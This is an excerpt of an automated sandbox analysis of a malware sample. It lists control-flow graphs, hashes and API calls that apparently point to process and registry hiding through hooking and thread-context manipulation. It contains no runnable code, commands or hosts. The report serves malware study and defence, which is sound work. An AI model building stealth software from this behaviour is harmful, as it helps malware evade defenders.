                                                                                                      control_flow_graph 166 125d40130b4-125d4013109 GetProcessHeap RtlAllocateHeap NtQuerySystemInformation 167 125d401310f-125d4013112 166->167 168 125d40131d1-125d40131ff GetProcessHeap HeapFree 166->168 169 125d4013117-125d401311a 167->169 170 125d4013114 167->170 171 125d401311c 169->171 172 125d401311f-125d4013122 169->172 170->169 171->172 173 125d4013127-125d401312d 172->173 174 125d4013124 172->174 175 125d40131cc 173->175 176 125d4013133-125d4013149 173->176 174->173 175->168 177 125d4013175-125d401317f call 125d4011d28 176->177 178 125d401314b-125d401315c 176->178 181 125d4013199-125d401319c 177->181 183 125d4013181-125d4013197 call 125d4011d60 177->183 178->177 179 125d401315e-125d4013173 StrCmpNIW 178->179 179->177 179->181 184 125d40131a5-125d40131a8 181->184 185 125d401319e-125d40131a2 181->185 183->181 190 125d40131bd-125d40131bf 183->190 187 125d40131aa-125d40131ae 184->187 188 125d40131b1-125d40131b4 184->188 185->184 187->188 189 125d40131b6-125d40131ba 188->189 188->190 189->190 190->175 192 125d40131c1-125d40131c6 190->192 192->175 192->176
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocateFreeInformationQuerySystem
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 4073547687-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: 21130b20d2e9a006f1e02b6f3ab3178ccd056863f786049b04cb6cfafb8fc06f
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: 82318231702F5992FB159F96A8842F9ABAAFB84B94F8441209E484BB54EB38D4B58700

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 199 125d40121cc-125d4012206 NtQuerySystemInformation 200 125d4012208-125d401220c 199->200 201 125d401220f-125d4012212 199->201 200->201 202 125d4012218-125d401221b 201->202 203 125d40123cd-125d40123ed 201->203 204 125d401231d-125d4012320 202->204 205 125d4012221-125d4012233 202->205 206 125d4012322-125d401233c call 125d40130b4 204->206 207 125d4012391-125d4012394 204->207 205->203 208 125d4012239-125d401224f 205->208 206->203 217 125d4012342-125d4012358 206->217 207->203 212 125d4012396-125d40123a9 call 125d40130b4 207->212 210 125d401227d-125d4012288 call 125d4011d28 208->210 211 125d4012251-125d4012261 208->211 218 125d40122a9-125d40122bb 210->218 225 125d401228a-125d40122a2 call 125d4011d60 210->225 211->210 214 125d4012263-125d401227b StrCmpNIW 211->214 212->203 224 125d40123ab-125d40123b3 212->224 214->210 214->218 217->203 223 125d401235a-125d4012376 217->223 221 125d40122cb-125d40122cd 218->221 222 125d40122bd-125d40122bf 218->222 228 125d40122cf-125d40122d2 221->228 229 125d40122d4 221->229 226 125d40122c6-125d40122c9 222->226 227 125d40122c1-125d40122c4 222->227 230 125d401237a-125d401238d 223->230 224->203 231 125d40123b5-125d40123bd 224->231 225->218 237 125d40122a4-125d40122a7 225->237 233 125d40122d7-125d40122da 226->233 227->233 228->233 229->233 230->230 234 125d401238f 230->234 235 125d40123c0-125d40123cb 231->235 238 125d40122e8-125d40122eb 233->238 239 125d40122dc-125d40122e2 233->239 234->203 235->203 235->235 237->233 238->203 240 125d40122f1-125d40122f5 238->240 239->208 239->238 241 125d40122f7-125d40122fa 240->241 242 125d401230c-125d4012318 240->242 241->203 243 125d4012300-125d4012305 241->243 242->203 243->240 244 125d4012307 243->244 244->203
                                                                                                      APIs
                                                                                                      • NtQuerySystemInformation.NTDLL ref: 00000125D40121F7
                                                                                                      • StrCmpNIW.SHLWAPI ref: 00000125D4012270
                                                                                                        • Part of subcall function 00000125D40130B4: GetProcessHeap.KERNEL32 ref: 00000125D40130D7
                                                                                                        • Part of subcall function 00000125D40130B4: RtlAllocateHeap.NTDLL ref: 00000125D40130EA
                                                                                                        • Part of subcall function 00000125D40130B4: NtQuerySystemInformation.NTDLL(?,?,?,?,?,00000125D40123A7), ref: 00000125D4013101
                                                                                                        • Part of subcall function 00000125D40130B4: StrCmpNIW.SHLWAPI ref: 00000125D401316B
                                                                                                        • Part of subcall function 00000125D40130B4: GetProcessHeap.KERNEL32 ref: 00000125D40131D1
                                                                                                        • Part of subcall function 00000125D40130B4: HeapFree.KERNEL32 ref: 00000125D40131DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$InformationProcessQuerySystem$AllocateFree
                                                                                                      • String ID: S$dialer
                                                                                                      • API String ID: 1053149212-3873981283
                                                                                                      • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                                      • Instruction ID: 1cab8037f6f5fcc83a8a22dbf3f84ecb9275b963d21d4cb1ccc6690f8ba3cd9f
                                                                                                      • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                                      • Instruction Fuzzy Hash: 2D51B132B12F2C96E764CBA594846FD7BA6F704784F849819EE45BBB84DB34C871C300
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: T_H
                                                                                                      • API String ID: 0-97390371
                                                                                                      • Opcode ID: 909088a2cbf2eb4658a091581d2f2003d087198f3fee2f94fc4a1486f5850b6a
                                                                                                      • Instruction ID: 558a4ee05f621a07a3c538cd25ed6cba84dd5c454c8ec4f3b1e5c64d5ae5704a
                                                                                                      • Opcode Fuzzy Hash: 909088a2cbf2eb4658a091581d2f2003d087198f3fee2f94fc4a1486f5850b6a
                                                                                                      • Instruction Fuzzy Hash: 6973A131B1894A4FE794EB2C94597B977D2EFD9300F1805BAD00DC72A6DE79BD428B02

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2262 125d4012a7c-125d4012ac5 NtEnumerateValueKey 2263 125d4012ac7-125d4012aca 2262->2263 2264 125d4012b20-125d4012b3e 2262->2264 2263->2264 2265 125d4012acc-125d4012ace 2263->2265 2266 125d4012ad0-125d4012ad2 2265->2266 2266->2264 2267 125d4012ad4-125d4012af9 NtEnumerateValueKey 2266->2267 2268 125d4012b0a 2267->2268 2269 125d4012afb-125d4012afe 2267->2269 2272 125d4012b0e-125d4012b15 call 125d4013930 2268->2272 2270 125d4012b00-125d4012b02 2269->2270 2271 125d4012b04-125d4012b08 2269->2271 2270->2272 2271->2272 2275 125d4012b17 2272->2275 2276 125d4012b19-125d4012b1e 2272->2276 2275->2276 2276->2264 2276->2266
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumerateValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1749906896-0
                                                                                                      • Opcode ID: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
                                                                                                      • Instruction ID: 89fb0b6591ccb916a033ca99e86f11bf1347409355d1e16078260f61467a039f
                                                                                                      • Opcode Fuzzy Hash: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
                                                                                                      • Instruction Fuzzy Hash: 9D11B432205F4882E761DF96B8C0AEABBA5F394B94F800029EE45D7750EF34D462C744
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 3332741929-0
                                                                                                      • Opcode ID: c753dd688f039d274d58710f06481aaa62c3bba43a6ea08ea8c38e2bf20065f0
                                                                                                      • Instruction ID: f950cda0394031874c4f0857031b8aa8a7051c87f20edfa1996113a1bc7fa39f
                                                                                                      • Opcode Fuzzy Hash: c753dd688f039d274d58710f06481aaa62c3bba43a6ea08ea8c38e2bf20065f0
                                                                                                      • Instruction Fuzzy Hash: F921D53291CB584FEB28EFAC984A6FD7BE0EB5A321F00417FD08EC3152DA6465468781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 10de3b81c5e121ed8c060359055e1b190d3b0399d7fb36ca1c22188c67743058
                                                                                                      • Instruction ID: 99f8c27c93f14028feb2ea2abfbfa404452c87a770bcea19036a2fab9170c5ef
                                                                                                      • Opcode Fuzzy Hash: 10de3b81c5e121ed8c060359055e1b190d3b0399d7fb36ca1c22188c67743058
                                                                                                      • Instruction Fuzzy Hash: 8642C030A18A094FEB58EB18C885ABDB3E1FF99300F5445B9D44EC7296DE75F8438B85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 98df77b28d5e02885a81663b7589dbf0ec974faed439cb6d6c7d4d854c849da5
                                                                                                      • Instruction ID: 1b54ae66426b3f95573eaab5c87cfa7ad203652016663a84a88c321435963fff
                                                                                                      • Opcode Fuzzy Hash: 98df77b28d5e02885a81663b7589dbf0ec974faed439cb6d6c7d4d854c849da5
                                                                                                      • Instruction Fuzzy Hash: FDF18430918A4D8FEBA8DF28D845BE937E1FF95310F04826FE84DC7291DB75A9458B81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a70f292e910be974b0e4795772357d5c3c7bb3c48358a4dfe90156c0f8d8296
                                                                                                      • Instruction ID: b3954248e13dec5974e66391ccd9db7ea5e1283781b369ed665ed53c64f96622
                                                                                                      • Opcode Fuzzy Hash: 2a70f292e910be974b0e4795772357d5c3c7bb3c48358a4dfe90156c0f8d8296
                                                                                                      • Instruction Fuzzy Hash: 36E1C430908A8D4FEBA8DF28C855BED77D1FF95310F14426ED84DC7291CE78A9458B81

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 94 125d4015c10-125d4015c37 95 125d4015c39-125d4015c48 94->95 96 125d4015c4b-125d4015c56 GetCurrentThreadId 94->96 95->96 97 125d4015c58-125d4015c5d 96->97 98 125d4015c62-125d4015c69 96->98 99 125d401608f-125d40160a6 call 125d4017a20 97->99 100 125d4015c7b-125d4015c8f 98->100 101 125d4015c6b-125d4015c76 call 125d4015a40 98->101 104 125d4015c9e-125d4015ca4 100->104 101->99 105 125d4015d75-125d4015d96 104->105 106 125d4015caa-125d4015cb3 104->106 112 125d4015d9c-125d4015dbc GetThreadContext 105->112 113 125d4015eff-125d4015f10 call 125d401759f 105->113 109 125d4015cb5-125d4015cf8 call 125d40186a0 106->109 110 125d4015cfa-125d4015d6d call 125d40145f0 call 125d4014590 call 125d4014550 106->110 122 125d4015d70 109->122 110->122 116 125d4015efa 112->116 117 125d4015dc2-125d4015de3 112->117 128 125d4015f15-125d4015f1b 113->128 116->113 117->116 125 125d4015de9-125d4015df2 117->125 122->104 129 125d4015e72-125d4015e83 125->129 130 125d4015df4-125d4015e05 125->130 132 125d4015fde-125d4015fee 128->132 133 125d4015f21-125d4015f78 VirtualProtect FlushInstructionCache 128->133 136 125d4015ef5 129->136 137 125d4015e85-125d4015ea3 129->137 138 125d4015e07-125d4015e1c 130->138 139 125d4015e6d 130->139 140 125d4015ffe-125d401600a call 125d4014ed0 132->140 141 125d4015ff0-125d4015ff7 132->141 134 125d4015f7a-125d4015f84 133->134 135 125d4015fa9-125d4015fd9 call 125d401798c 133->135 134->135 143 125d4015f86-125d4015fa1 call 125d4014470 134->143 135->128 137->136 145 125d4015ea5-125d4015eec call 125d40139e0 137->145 138->139 146 125d4015e1e-125d4015e68 call 125d4013a50 SetThreadContext 138->146 139->136 158 125d401600f-125d4016015 140->158 141->140 147 125d4015ff9 call 125d40144c0 141->147 143->135 145->136 159 125d4015ef0 call 125d40175bd 145->159 146->139 147->140 160 125d4016057-125d4016075 158->160 161 125d4016017-125d4016055 ResumeThread call 125d401798c 158->161 159->136 163 125d4016077-125d4016086 160->163 164 125d4016089 160->164 161->158 163->164 164->99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 1666949209-753981864
                                                                                                      • Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                                                                      • Instruction ID: 9894714288dd5977749814438e6af2f29509089d0987ff95d62d207a1646ba48
                                                                                                      • Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                                                                      • Instruction Fuzzy Hash: 15D1BD76209F8886DB709B59E4D43EA7BA1F7C8B84F500116EA8D8BBA5CF3CC551CB40

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: 4e976c967fbf569d0e9a24c5d06389c9434e68e04dec2b69616c11e4be67e9dd
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: 9F113C3A705F4483FB149BA1F4942EA6AAAF788B84F840029DE894BB94EF3DC554C704

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1284 7ff95a54c721-7ff95a54c725 1285 7ff95a54c747 1284->1285 1286 7ff95a54c727-7ff95a54c72f 1284->1286 1288 7ff95a54c749-7ff95a54c77a 1285->1288 1289 7ff95a54c796-7ff95a54c7a4 1285->1289 1292 7ff95a54c77e 1286->1292 1293 7ff95a54c731-7ff95a54c734 1286->1293 1288->1292 1291 7ff95a54c7a5-7ff95a54c7b2 1289->1291 1296 7ff95a54c7b5-7ff95a54c7bf Process32First 1291->1296 1294 7ff95a54c7e0-7ff95a54c855 call 7ff95a54c856 1292->1294 1295 7ff95a54c781-7ff95a54c789 1292->1295 1293->1291 1297 7ff95a54c736-7ff95a54c739 1293->1297 1298 7ff95a54c78a-7ff95a54c795 1295->1298 1299 7ff95a54c7c1-7ff95a54c7ca 1296->1299 1297->1296 1300 7ff95a54c73b 1297->1300 1298->1289 1302 7ff95a54c7cc 1299->1302 1303 7ff95a54c7d2-7ff95a54c7de 1299->1303 1300->1298 1304 7ff95a54c73d-7ff95a54c745 1300->1304 1302->1303 1303->1294 1304->1285 1304->1299
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FirstProcess32
                                                                                                      • String ID: 9_Z$9_Z
                                                                                                      • API String ID: 2623510744-3579562880
                                                                                                      • Opcode ID: 67ebb35bd7d3de506738e44800b4efcbbc818f73b051e4d9a37485f00c4b2816
                                                                                                      • Instruction ID: 69746be79baeace32d6c379082a2494b2238188e64520bfb55d4342b5ca4cecb
                                                                                                      • Opcode Fuzzy Hash: 67ebb35bd7d3de506738e44800b4efcbbc818f73b051e4d9a37485f00c4b2816
                                                                                                      • Instruction Fuzzy Hash: DC41C43290DA198FEB65DB189845BECB3F0EF96320F0401F9C04DD7192DA79B9868F85

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1309 125d40151b0-125d40151dc 1310 125d40151de-125d40151e6 1309->1310 1311 125d40151ed-125d40151f6 1309->1311 1310->1311 1312 125d40151f8-125d4015200 1311->1312 1313 125d4015207-125d4015210 1311->1313 1312->1313 1314 125d4015212-125d401521a 1313->1314 1315 125d4015221-125d401522a 1313->1315 1314->1315 1316 125d4015236-125d4015241 GetCurrentThreadId 1315->1316 1317 125d401522c-125d4015231 1315->1317 1319 125d401524d-125d4015254 1316->1319 1320 125d4015243-125d4015248 1316->1320 1318 125d40157b3-125d40157ba 1317->1318 1321 125d4015256-125d401525c 1319->1321 1322 125d4015261-125d401526a 1319->1322 1320->1318 1321->1318 1323 125d4015276-125d4015282 1322->1323 1324 125d401526c-125d4015271 1322->1324 1325 125d40152ae-125d4015305 call 125d40157c0 * 2 1323->1325 1326 125d4015284-125d40152a9 1323->1326 1324->1318 1331 125d4015307-125d401530e 1325->1331 1332 125d401531a-125d4015323 1325->1332 1326->1318 1333 125d4015316 1331->1333 1334 125d4015310 1331->1334 1335 125d4015335-125d401533e 1332->1335 1336 125d4015325-125d4015332 1332->1336 1338 125d4015386-125d401538a 1333->1338 1337 125d4015390-125d4015396 1334->1337 1339 125d4015340-125d4015350 1335->1339 1340 125d4015353-125d4015378 call 125d4017950 1335->1340 1336->1335 1342 125d40153c5-125d40153cb 1337->1342 1343 125d4015398-125d40153b4 call 125d4014470 1337->1343 1338->1337 1339->1340 1349 125d401537e 1340->1349 1350 125d401540d-125d4015422 call 125d4013da0 1340->1350 1344 125d40153f5-125d4015408 1342->1344 1345 125d40153cd-125d40153ec call 125d401798c 1342->1345 1343->1342 1354 125d40153b6-125d40153be 1343->1354 1344->1318 1345->1344 1349->1338 1356 125d4015431-125d401543a 1350->1356 1357 125d4015424-125d401542c 1350->1357 1354->1342 1358 125d401544c-125d401549a call 125d4018d50 1356->1358 1359 125d401543c-125d4015449 1356->1359 1357->1338 1362 125d40154a2-125d40154aa 1358->1362 1359->1358 1363 125d40155b7-125d40155bf 1362->1363 1364 125d40154b0-125d401559b call 125d4017520 1362->1364 1366 125d40155c1-125d40155d4 call 125d4014670 1363->1366 1367 125d4015603-125d401560b 1363->1367 1375 125d401559d 1364->1375 1376 125d401559f-125d40155ae call 125d4014140 1364->1376 1381 125d40155d6 1366->1381 1382 125d40155d8-125d4015601 1366->1382 1370 125d4015617-125d4015626 1367->1370 1371 125d401560d-125d4015615 1367->1371 1373 125d4015628 1370->1373 1374 125d401562f 1370->1374 1371->1370 1372 125d4015634-125d4015641 1371->1372 1379 125d4015644-125d4015699 call 125d40186a0 1372->1379 1380 125d4015643 1372->1380 1373->1374 1374->1372 1375->1363 1385 125d40155b0 1376->1385 1386 125d40155b2 1376->1386 1388 125d40156a8-125d4015741 call 125d40145f0 call 125d4014550 VirtualProtect 1379->1388 1389 125d401569b-125d40156a3 1379->1389 1380->1379 1381->1367 1382->1363 1385->1363 1386->1362 1394 125d4015751-125d40157b1 1388->1394 1395 125d4015743-125d4015748 GetLastError 1388->1395 1394->1318 1395->1394
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2882836952-0
                                                                                                      • Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                                                                      • Instruction ID: 8c0540d1c56d8e9b4c528949a2974bf1262faee44f260c2e89a323b1ff5fef36
                                                                                                      • Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                                                                      • Instruction Fuzzy Hash: 8902DC3621AB8486E760CB95F4907AABBB1F3C5794F500115EA8E8BBA8DF7CC454CF40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1559 125d4013ac0-125d4013ae1 call 125d4013d10 1562 125d4013ae6-125d4013af0 1559->1562 1563 125d4013af6-125d4013b02 1562->1563 1564 125d4013bda 1562->1564 1565 125d4013b24-125d4013b4e call 125d4018d50 VirtualQuery 1563->1565 1566 125d4013b04-125d4013b10 1563->1566 1567 125d4013bdc-125d4013be0 1564->1567 1571 125d4013b55-125d4013b5d 1565->1571 1572 125d4013b50 1565->1572 1566->1565 1568 125d4013b12-125d4013b22 1566->1568 1568->1562 1573 125d4013bbd-125d4013bd0 call 125d4013d10 1571->1573 1574 125d4013b5f-125d4013b68 1571->1574 1572->1564 1580 125d4013bd5 1573->1580 1574->1573 1575 125d4013b6a-125d4013b90 VirtualAlloc 1574->1575 1578 125d4013b9b-125d4013ba5 GetLastError 1575->1578 1579 125d4013b92-125d4013b97 1575->1579 1581 125d4013ba7-125d4013ba9 1578->1581 1582 125d4013bab-125d4013bbb 1578->1582 1579->1567 1580->1562 1581->1567 1582->1580
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 31662377-0
                                                                                                      • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction ID: ef5f110eb739758346858cf15028b7f672ffd2ea4d96261a09ad2445c4628281
                                                                                                      • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction Fuzzy Hash: 6C31C73121AE4881FB70DB95E0D47EA6BA6F384784F900525F6CD8BB98DF7DC5608B44

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1583 125d4013458-125d4013467 1584 125d401346d-125d4013482 GetModuleFileNameW 1583->1584 1585 125d40134ef-125d40134f1 1583->1585 1588 125d40134eb-125d40134ed 1584->1588 1589 125d4013484-125d4013499 PathFindFileNameW call 125d4013930 1584->1589 1586 125d40134f8 1585->1586 1587 125d40134f3 call 125d40137ac 1585->1587 1590 125d40134fd-125d4013505 1586->1590 1587->1586 1588->1590 1589->1588 1594 125d401349b-125d40134a2 call 125d4013878 1589->1594 1594->1588 1597 125d40134a4-125d40134ab 1594->1597 1597->1586 1598 125d40134ad-125d40134e4 CreateThread call 125d4011eb4 1597->1598 1600 125d40134e9 1598->1600 1600->1586
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1683269324-0
                                                                                                      • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction ID: 33b71a4d5e236b34fa9084d6c07cd06a7bb3c93a53689d74dbde3233c6243ca2
                                                                                                      • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction Fuzzy Hash: 3D115770626E1983FB2197E5A8C67F92E9BFB58705FD400299A06CD5D4EF3DE0A88250

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
